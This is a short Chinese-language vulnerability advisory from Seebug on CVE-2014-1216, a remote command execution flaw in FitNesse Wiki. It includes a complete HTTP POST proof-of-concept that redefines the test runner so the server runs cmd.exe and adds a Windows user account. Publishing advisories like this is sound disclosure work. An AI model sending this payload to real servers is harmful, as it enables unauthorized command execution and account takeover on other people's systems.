Fitnesse远程代码执行漏洞

2014-03-0500:00:00

Root

www.seebug.org

0.064 Low

EPSS

Percentile

93.7%

JSON

Bugtraq ID:65921
CVE ID:CVE-2014-1216

FitNesse是一套软件开发协作工具。

Fitnesse Wiki不正确校验已编辑页面语法参数数据，允许远程攻击者利用漏洞提交特殊的请求以应用程序上下文执行任意命令。
0
Fitnesse Wiki v20131110
目前没有详细解决方案提供：

http://www.fitnesse.org


                                                POST /&lt;any page&gt; HTTP/1.1
Host: &lt;host&gt;:&lt;port&gt;
Proxy-Connection: keep-alive
Content-Length: 374
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://&lt;host&gt;:&lt;port&gt;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://&lt;host&gt;:&lt;port&gt;/&lt;page&gt;?edit
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Cookie: textwrapon=false; wysiwyg=textarea
editTime=1384209902568&amp;ticketId=-7153973663219190464&amp;responder=saveData&amp;helpText=&amp;suites=&amp;__EDITOR__1=textarea&amp;pageContent=%21define+COMMAND_PATTERN+%7B%25m+%7C%7C+%7D%0D%0A%21define+TEST_RUNNER+%7Bcmd.exe+%2Fc+%22net+user+XXXXXXXX+XXXXXXXX+%2Fadd%22%7D%0D%0A%21path+dotnet4%5Cdbfit.dll%0D%0A%21path+dotnet4%5Cdbfit.sqlserver.dll%0D%0A%21path+dotnet2%5C*.dll&amp;save=Save

0.064 Low

EPSS

Percentile

93.7%

JSON

Related for SSV:61648